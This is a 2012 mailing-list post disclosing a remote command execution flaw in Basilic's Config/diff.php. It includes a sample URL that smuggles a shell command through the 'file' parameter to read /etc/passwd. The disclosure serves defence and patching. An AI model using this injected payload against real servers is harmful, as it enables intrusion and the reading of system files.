Basilic RCE bug

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Basilic RCE bug
From: m.razavi777@xxxxxxxxx
Date: Sat, 30 Jun 2012 20:45:21 GMT

Hi
Dear Sir

Basilic is  an Automated Bibliography Server for Research Publications Diffusion that use by many research center.
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server.
sample:
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Regards
M.Razavi

Prev by Date: [SECURITY] [DSA 2505-1] zendframework security update
Next by Date: Sun iPlanet Error Page Link Injection
Previous by thread: [SECURITY] [DSA 2505-1] zendframework security update
Next by thread: Re: Basilic RCE bug
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux